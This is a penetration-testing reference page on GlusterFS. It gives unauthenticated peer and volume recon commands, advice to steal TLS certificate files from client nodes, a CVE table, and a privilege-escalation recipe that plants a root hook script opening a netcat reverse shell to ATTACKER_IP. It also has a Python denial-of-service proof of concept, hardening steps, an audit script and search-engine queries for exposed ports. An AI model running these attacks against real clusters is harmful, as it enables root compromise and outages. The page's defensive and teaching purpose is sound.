24007 - Glusterfs

💡 Study note: This document covers penetration-testing methods for 24007-24008-24009-49152 - GlusterFS and is intended as a reference for information-security beginners and practitioners.

⚠️ Legal notice: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.


Information Gathering

Install the client utilities on your attacking box:

sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu

  1. Peer discovery & health

# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status

  2. Volume reconnaissance

# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all

  3. Mount without privileges

sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster

If mounting fails, check /var/log/glusterfs/<vol_name>-<uid>.log on the client side. Common issues are:

  • TLS enforcement (option transport.socket.ssl on)
  • Address-based access control (option auth.allow <cidr>)

Certificate troubleshooting

Steal the following files from any authorised client node and place them in /etc/ssl/ (or the directory shown in the error log):

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Known Vulnerabilities (2022-2025)

CVE            | Affected versions | Impact                                                               | Notes
CVE-2022-48340 | 10.0–10.4, 11.0   | Use-after-free in dht_setxattr_mds_cbk reachable through the network | Remote denial of service and probable remote code execution. Fixed in 10.4.1 / 11.1.
CVE-2023-26253 | < 11.0            | Out-of-bounds read in FUSE notify handler                            | Remote crash via crafted FS operations; public PoC available.
CVE-2023-3775  | < 10.5 / 11.1     | Incorrect permission validation when mounting gluster_shared_storage | Lets any unauthenticated client mount the admin volume; leads to the privilege escalation explained below.

Always check gluster --version on every node; heterogeneous clusters are common after partial upgrades.

Exploiting gluster_shared_storage (Privilege Escalation)

Even in recent versions many administrators leave the special gluster_shared_storage volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with root on every node.

# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root

If hooks/1/ is not present, look for /ss_bricks/ – the exact path may vary with the major version.

Denial-of-Service PoC (CVE-2023-26253)

#!/usr/bin/env python3
# Minimal reproducer: sends a malformed NOTIFY_REPLY XDR frame to 24007
import socket, struct

# XDR encodes an unsigned int as 4 bytes big-endian; struct replaces the
# xdrlib module, which was removed in Python 3.13
payload = struct.pack("!I", 0xdeadbeef)
with socket.create_connection(("10.10.11.131", 24007)) as s:
    # RPC record marker: high bit = last fragment, low 31 bits = fragment length
    s.sendall(struct.pack("!L", len(payload) | 0x80000000))
    s.sendall(payload)

Running the script crashes glusterfsd < 11.0.


Hardening & Detection

  • Upgrade – current LTS is 11.1 (July 2025). All CVEs above are fixed.

  • Enable TLS for every brick:

    gluster volume set <vol> transport.socket.ssl on
    gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem

  • Restrict clients with CIDR lists:

    gluster volume set <vol> auth.allow 10.0.0.0/24

  • Expose management port 24007 only on a private VLAN or through SSH tunnels.

  • Watch logs: tail -f /var/log/glusterfs/glusterd.log, and enable the audit-log feature (gluster volume set <vol> features.audit-log on).
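To check the TLS and auth.allow settings above across a whole cluster at once, the following added example (not from the original page or the GlusterFS project) parses the output of `gluster volume info all` and flags every volume that still has the weak defaults; the sample output, host names and brick paths are constructed for illustration.

```python
import re

# Constructed sample of `gluster volume info all` output (hypothetical hosts/bricks).
SAMPLE_OUTPUT = """\
Volume Name: data
Type: Replicate
Status: Started
Bricks:
Brick1: node1:/bricks/data
Brick2: node2:/bricks/data
Options Reconfigured:
transport.socket.ssl: on
auth.allow: 10.0.0.0/24

Volume Name: gluster_shared_storage
Type: Replicate
Status: Started
Bricks:
Brick1: node1:/var/lib/glusterd/ss_brick
Options Reconfigured:
cluster.enable-shared-storage: enable
"""

def parse_volumes(text):
    """Return {volume_name: {key: value}} from `gluster volume info` output."""
    volumes, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^Volume Name:\s*(\S+)", line)
        if m:
            current = m.group(1)
            volumes[current] = {}
        elif current and ": " in line and not line.startswith("Brick"):
            key, _, value = line.partition(": ")
            volumes[current][key.strip()] = value.strip()
    return volumes

def audit(text):
    """Return {volume_name: [finding, ...]} for each volume with weak settings."""
    findings = {}
    for name, opts in parse_volumes(text).items():
        issues = []
        if opts.get("transport.socket.ssl", "off").lower() != "on":
            issues.append("TLS not enforced (transport.socket.ssl is not 'on')")
        if opts.get("auth.allow", "*").strip() == "*":   # '*' is the gluster default
            issues.append("no client restriction (auth.allow unset or '*')")
        if name == "gluster_shared_storage" and issues:
            issues.append("admin volume reachable without TLS/CIDR controls")
        if issues:
            findings[name] = issues
    return findings
```

Feed it real output with `audit(subprocess.check_output(["gluster", "volume", "info", "all"], text=True))` on a trusted node; a non-empty result for gluster_shared_storage is the condition the privilege-escalation section above relies on.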



Search Engine Queries

FOFA

# FOFA search syntax
port="24007"

Shodan

# Shodan search syntax
port:24007

ZoomEye

# ZoomEye search syntax
port:24007

📖 References